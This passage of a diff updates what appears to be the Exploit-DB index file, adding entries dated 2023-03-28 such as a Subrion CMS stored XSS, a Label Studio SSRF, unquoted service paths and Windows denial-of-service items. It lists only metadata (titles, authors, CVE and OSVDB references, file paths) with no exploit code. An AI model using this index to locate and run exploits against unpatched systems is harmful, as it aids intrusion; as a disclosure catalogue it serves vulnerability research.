Access",2006-08-03,rgod,webapps,php,,2006-08-02,2016-08-31,1,OSVDB-27782,,,,http://www.exploit-db.comsendcard_3-4-0.tar.gz, 3827,exploits/php/webapps/3827.txt,"Sendcard 3.4.1 - 'sendcard.php?form' Local File Inclusion",2007-05-01,ettee,webapps,php,,2007-04-30,2016-09-30,1,OSVDB-35738;CVE-2007-2471,,,,http://www.exploit-db.comsendcard_3-4-1.tar.gz, 4029,exploits/php/webapps/4029.php,"Sendcard 3.4.1 - Local File Inclusion / Remote Code Execution",2007-06-04,Silentz,webapps,php,,2007-06-03,,1,OSVDB-35741;CVE-2007-3082,,,,, @@ -29443,6 +29458,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 23382,exploits/php/webapps/23382.txt,"Social Sites MyBB Plugin 0.2.2 - Cross-Site Scripting",2012-12-14,s3m00t,webapps,php,,2012-12-14,2012-12-14,1,OSVDB-88458,,,,http://www.exploit-db.comsocialsites.zip, 33658,exploits/php/webapps/33658.txt,"Social Web CMS 2 - 'index.php' Cross-Site Scripting",2010-02-19,GoLdeN-z3r0,webapps,php,,2010-02-19,2014-06-07,1,,,,,,https://www.securityfocus.com/bid/38329/info 10583,exploits/php/webapps/10583.txt,"social Web CMS Beta 2 - Multiple Vulnerabilities",2009-12-21,cp77fk4r,webapps,php,,2009-12-20,,1,OSVDB-61239;OSVDB-61238,,,,http://www.exploit-db.com1_SocialWebCMS_B2_RC1.zip, +51116,exploits/php/webapps/51116.txt,"Social-Share-Buttons v2.2.3 - SQL Injection",2023-03-28,nu11secur1ty,webapps,php,,2023-03-28,2023-03-28,0,,,,,, 34256,exploits/php/webapps/34256.py,"SocialABC NetworX 1.0.3 - Arbitrary File Upload / Cross-Site Scripting",2010-07-05,"John Leitch",webapps,php,,2010-07-05,2014-08-04,1,,,,,,https://www.securityfocus.com/bid/41396/info 18487,exploits/php/webapps/18487.html,"SocialCMS 1.0.2 - Cross-Site Request Forgery",2012-02-16,"Ivano Binetti",webapps,php,,2012-02-16,2012-02-16,0,OSVDB-71930;CVE-2012-1416,,,,http://www.exploit-db.comsocialcms1.0.2.zip, 17193,exploits/php/webapps/17193.html,"SocialCMS 1.0.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2011-04-20,vir0e5,webapps,php,,2011-04-20,2011-04-20,0,OSVDB-71930;CVE-2012-1416,,,,http://www.exploit-db.comsocialcms1.0.2.zip, @@ -29816,6 +29832,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 49876,exploits/php/webapps/49876.py,"Subrion CMS 4.2.1 - Arbitrary File Upload",2021-05-17,"Fellipe Oliveira",webapps,php,,2021-05-17,2021-10-29,0,CVE-2018-19422,,,,, 50737,exploits/php/webapps/50737.txt,"Subrion CMS 4.2.1 - Cross Site Request Forgery (CSRF) (Add Amin)",2022-02-11,"Aryan Chehreghani",webapps,php,,2022-02-11,2022-02-11,0,,,,,, 45150,exploits/php/webapps/45150.txt,"Subrion CMS 4.2.1 - Cross-Site Scripting",2018-08-06,"Zeel Chavda",webapps,php,,2018-08-06,2018-08-08,0,CVE-2018-14840,"Cross-Site Scripting (XSS)",,,http://www.exploit-db.comsubrion_cms_4.2.1.zip, +51110,exploits/php/webapps/51110.txt,"Subrion CMS 4.2.1 - Stored Cross-Site Scripting (XSS)",2023-03-28,"Sinem Şahin",webapps,php,,2023-03-28,2023-03-28,0,,,,,, 26252,exploits/php/webapps/26252.txt,"Subscribe Me Pro 2.44 - S.pl Directory Traversal",2005-09-13,h4cky0u,webapps,php,,2005-09-13,2013-06-17,1,CVE-2005-2952;OSVDB-19380,,,,,https://www.securityfocus.com/bid/14817/info 22625,exploits/php/webapps/22625.txt,"SudBox Boutique 1.2 - 'login.php' Authentication Bypass",2003-05-21,frog,webapps,php,,2003-05-21,2012-11-11,1,,,,,,https://www.securityfocus.com/bid/7651/info 10248,exploits/php/webapps/10248.txt,"Sugar CRM 5.5.0.rc2/5.2.0j - Multiple Vulnerabilities",2009-11-29,waraxe,webapps,php,,2009-11-28,,1,,,,,, @@ -33879,6 +33896,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50374,exploits/php/webapps/50374.txt,"Young Entrepreneur E-Negosyo System 1.0 - SQL Injection Authentication Bypass",2021-10-04,"Jordan Glover",webapps,php,,2021-10-04,2021-10-04,0,,,,,, 47294,exploits/php/webapps/47294.txt,"YouPHPTube 7.2 - 'userCreate.json.php' SQL Injection",2019-08-19,"Fabian Mosch",webapps,php,80,2019-08-19,2019-08-19,0,CVE-2019-14430,"SQL Injection (SQLi)",,,http://www.exploit-db.comYouPHPTube-7.2.tar.gz, 47326,exploits/php/webapps/47326.txt,"YouPHPTube 7.4 - Remote Code Execution",2019-08-30,"Damian Ebelties",webapps,php,80,2019-08-30,2019-08-30,0,,,,,http://www.exploit-db.comYouPHPTube-7.4.tar.gz, +51101,exploits/php/webapps/51101.txt,"YouPHPTube<= 7.8 - Multiple Vulnerabilities",2023-03-28,"Rafael Pedrero",webapps,php,,2023-03-28,2023-03-28,0,,,,,, 33908,exploits/php/webapps/33908.txt,"Your Articles Directory - Login Option SQL Injection",2010-04-29,Sid3^effects,webapps,php,,2010-04-29,2014-06-28,1,,,,,,https://www.securityfocus.com/bid/39796/info 38367,exploits/php/webapps/38367.txt,"Your Own Classifieds - Cross-Site Scripting",2013-03-08,"Rafay Baloch",webapps,php,,2013-03-08,2015-09-30,1,,,,,,https://www.securityfocus.com/bid/58399/info 12785,exploits/php/webapps/12785.pl,"YourArcadeScript 2.0b1 - Blind SQL Injection",2010-05-28,DNX,webapps,php,,2010-05-27,,0,,,,,, @@ -34175,6 +34193,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 50393,exploits/python/webapps/50393.txt,"django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS)",2021-10-08,"Raven Security Associates",webapps,python,,2021-10-08,2021-10-08,0,CVE-2021-42053,,,,, 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,, 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz, +51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,, 40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",webapps,python,80,2016-11-21,2016-11-21,0,,,,,http://www.exploit-db.commezzanine-4.2.0.tar.gz, 49803,exploits/python/webapps/49803.py,"OpenPLC 3 - Remote Code Execution (Authenticated)",2021-04-26,"Fellipe Oliveira",webapps,python,,2021-04-26,2021-11-17,0,,,,,, 50101,exploits/python/webapps/50101.py,"Pallets Werkzeug 0.15.4 - Path Traversal",2021-07-06,faisalfs10x,webapps,python,,2021-07-06,2021-07-06,0,CVE-2019-14322,,,,http://www.exploit-db.comwerkzeug-0.15.4.zip, @@ -38120,6 +38139,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 14236,exploits/windows/dos/14236.txt,"Sun Java Web Server 7.0 u7 - Admin Interface Denial of Service",2010-07-06,muts,dos,windows,8800,2010-07-06,2010-07-06,1,,,,http://www.exploit-db.com/screenshots/idlt14500/14236.png,, 4168,exploits/windows/dos/4168.vbs,"Sun Java WebStart - JNLP Stack Buffer Overflow (PoC)",2007-07-10,ZhenHan.Liu,dos,windows,,2007-07-09,2016-10-05,1,CVE-2007-3655,,,,, 17885,exploits/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",dos,windows,,2011-09-23,2011-09-23,1,OSVDB-75800;OSVDB-75799;OSVDB-75798;OSVDB-75796;OSVDB-75795;OSVDB-75684,,,,, +51102,exploits/windows/dos/51102.txt,"SuperMailer v11.20 - Buffer overflow DoS",2023-03-28,"Rafael Pedrero",dos,windows,,2023-03-28,2023-03-28,0,,,,,, 38758,exploits/windows/dos/38758.py,"SuperScan 4.1 - Scan Hostname/IP Field Buffer Overflow",2015-11-19,"Luis Martínez",dos,windows,,2015-11-19,2015-11-19,0,,,,,, 38759,exploits/windows/dos/38759.py,"SuperScan 4.1 - Tools Hostname/IP/URL Field Buffer Overflow",2015-11-19,"Luis Martínez",dos,windows,,2015-11-19,2015-11-19,0,,,,,, 38760,exploits/windows/dos/38760.py,"SuperScan 4.1 - Windows Enumeration Hostname/IP/URL Field Overflow (SEH)",2015-11-19,"Luis Martínez",dos,windows,,2015-11-19,2015-11-19,0,OSVDB-130627,,,,, @@ -38272,6 +38292,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 9364,exploits/windows/dos/9364.py,"Tuniac 090517c - '.m3u' Local File Crash (PoC)",2009-08-05,Dr_IDE,dos,windows,,2009-08-04,2017-04-01,1,OSVDB-64560;CVE-2009-4867,,,,, 9671,exploits/windows/dos/9671.py,"Tuniac 090517c - '.pls' Local Crash (PoC)",2009-09-14,zAx,dos,windows,,2009-09-13,,1,OSVDB-58882;CVE-2009-3574,,,,, 14689,exploits/windows/dos/14689.pl,"Tuniac 100723 - Denial of Service",2010-08-19,d4rk-h4ck3r,dos,windows,,2010-08-19,2010-08-19,1,,,,http://www.exploit-db.com/screenshots/idlt15000/14689.png,http://www.exploit-db.comTuniac_Setup_100723.exe, +51114,exploits/windows/dos/51114.c,"Tunnel Interface Driver - Denial of Service",2023-03-28,ExAllocatePool2,dos,windows,,2023-03-28,2023-03-28,0,,,,,, 11131,exploits/windows/dos/11131.pl,"TurboFTP Server 1.00.712 - Remote Denial of Service",2010-01-13,corelanc0d3r,dos,windows,,2010-01-12,2011-01-05,1,OSVDB-61671,,,http://www.exploit-db.com/screenshots/idlt11500/screen-shot-2011-01-04-at-83246-pm.png,http://www.exploit-db.comtbftpsrv1.00.712.exe, 3341,exploits/windows/dos/3341.cpp,"TurboFTP Server 5.30 Build 572 - 'newline/LIST' Multiple Remote Denial of Service Vulnerabilities",2007-02-20,Marsu,dos,windows,,2007-02-19,2016-09-27,1,OSVDB-33782;CVE-2007-1080;OSVDB-33752;CVE-2007-1075;OSVDB-33751,,,,, 23254,exploits/windows/dos/23254.txt,"TVMOBiLi 2.1.0.3557 - Denial of Service",2012-12-09,"High-Tech Bridge SA",dos,windows,,2012-12-09,2012-12-09,0,CVE-2012-5451;OSVDB-88274;OSVDB-88174,,,,http://www.exploit-db.comtvmobili-windows-i386.exe,https://www.htbridge.com/advisory/HTB23120 @@ -38402,6 +38423,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 40398,exploits/windows/dos/40398.txt,"VMware Workstation - 'vprintproxy.exe' TrueType NAME Tables Heap Buffer Overflow (PoC)",2016-09-19,"Google Security Research",dos,windows,,2016-09-19,2016-09-19,1,CVE-2016-7083,,,,,https://bugs.chromium.org/p/project-zero/issues/detail?id=849 42140,exploits/windows/dos/42140.c,"VMware Workstation 12 Pro - Denial of Service",2017-06-08,"Borja Merino",dos,windows,,2017-06-08,2017-06-08,1,CVE-2017-4916,,,,, 44533,exploits/windows/dos/44533.c,"VMware Workstation 12.5.2 - Drag n Drop Use-After-Free (Pwn2Own 2017) (PoC)",2018-04-23,keenlab,dos,windows,,2018-04-25,2018-04-25,0,,Pwn2Own,,,,https://keenlab.tencent.com/en/2018/04/23/A-bunch-of-Red-Pills-VMware-Escapes/ +51100,exploits/windows/dos/51100.txt,"VMware Workstation 15 Pro - Denial of Service",2023-03-28,"Milad karimi",dos,windows,,2023-03-28,2023-03-28,0,,,,,, 6262,exploits/windows/dos/6262.txt,"VMware Workstation 6.5.1 - 'hcmon.sys 6.0.0.45731' Local Denial of Service",2008-08-18,g_,dos,windows,,2008-08-17,2016-12-20,1,OSVDB-48051;CVE-2008-3761,,,,, 15103,exploits/windows/dos/15103.py,"VMware Workstation 7.1.1 - 'VMkbd.sys' Denial of Service",2010-09-25,"Lufeng Li",dos,windows,,2010-09-25,2010-09-26,1,,,,,, 21170,exploits/windows/dos/21170.txt,"Volition Red Faction 1.0/1.1 - Game Server/Client Denial of Service",2001-12-07,sh0,dos,windows,,2001-12-07,2012-09-09,1,CVE-2001-0952;OSVDB-10605,,,,,https://www.securityfocus.com/bid/3651/info @@ -39615,6 +39637,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 19192,exploits/windows/local/19192.txt,"Hancom Office 2007 - 'Reboot.ini' Clear-Text Passwords",1999-02-09,"Russ Cooper",local,windows,,1999-02-09,2012-06-16,1,CVE-1999-0372;OSVDB-11490,,,,,https://www.securityfocus.com/bid/228/info 38504,exploits/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,local,windows,,2015-10-21,2015-10-21,0,OSVDB-129366,,,,http://www.exploit-db.comHandyPassword.exe, 50566,exploits/windows/local/50566.txt,"HCL Lotus Notes V12 - Unquoted Service Path",2021-12-06,"Mert Daş",local,windows,,2021-12-06,2021-12-06,0,,,,,, +51105,exploits/windows/local/51105.txt,"HDD Health 4.2.0.112 - 'HDDHealth' Unquoted Service Path",2023-03-28,"Jorge Manuel Lozano Gómez",local,windows,,2023-03-28,2023-03-28,0,,,,,, 37737,exploits/windows/local/37737.rb,"Heroes of Might and Magic III - '.h3m' Map file Buffer Overflow (Metasploit)",2015-08-07,Metasploit,local,windows,,2015-08-07,2015-08-07,1,OSVDB-125529,"Metasploit Framework (MSF)",,,http://www.exploit-db.comHoMM3_HD_Latest.exe, 37716,exploits/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",local,windows,,2015-07-29,2015-08-07,1,,,,,http://www.exploit-db.comHoMM3_HD_Latest.exe, 39820,exploits/windows/local/39820.txt,"Hex : Shard of Fate 1.0.1.026 - Unquoted Path Privilege Escalation",2016-05-16,"Cyril Vallicari",local,windows,,2016-05-16,2016-05-16,0,,,,,, @@ -40908,6 +40931,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd 42119,exploits/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,local,windows,,2017-06-05,2018-07-20,1,CVE-2017-9355,,,http://www.exploit-db.com/screenshots/idlt42500/42119.png,http://www.exploit-db.comSubsonic.exe, 17225,exploits/windows/local/17225.rb,"Subtitle Processor 7.7.1 - '.m3u' File Buffer Overflow (SEH Unicode) (Metasploit)",2011-04-28,Metasploit,local,windows,,2011-04-29,2011-04-29,1,OSVDB-72050,"Metasploit Framework (MSF)",,,http://www.exploit-db.comSubtitleProcessor771.zip, 17217,exploits/windows/local/17217.py,"Subtitle Processor 7.7.1 - Local Buffer Overflow (SEH Unicode)",2011-04-27,"Brandon Murphy",local,windows,,2011-04-27,2011-04-27,1,OSVDB-72050,,,http://www.exploit-db.com/screenshots/idlt17500/screen-shot-2011-04-26-at-82906-pm.png,http://www.exploit-db.comSubtitleProcessor771.zip, +51106,exploits/windows/local/51106.txt,"SugarSync 4.1.3 - 'SugarSync Service' Unquoted Service Path",2023-03-28,"Jorge Manuel Lozano Gómez",local,windows,,2023-03-28,2023-03-28,0,,,,,, 41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,,2017-03-23,2017-03-23,1,CVE-2010-1423;CVE-2010-0886;OSVDB-63648,,,,,https://github.com/rapid7/metasploit-framework/blob/b08d1ad8d8d6c0f5cb63cc44e3ff75efb9edb7b3/modules/exploits/windows/browser/java_ws_arginject_altjvm.rb 27041,exploits/windows/local/27041.pl,"Super Player 3500 - '.m3u' Local Stack Buffer Overflow",2013-07-23,jun,local,windows,,2013-07-23,2013-08-05,1,,,,http://www.exploit-db.com/screenshots/idlt27500/screen-shot-2013-08-05-at-50823-pm.png,http://www.exploit-db.comsetup_3500.exe, 13767,exploits/windows/local/13767.c,"SureThing CD Labeler - '.m3u/.pls' Unicode Stack Overflow",2010-06-08,mr_me,local,windows,,2010-06-07,,1,,,,,,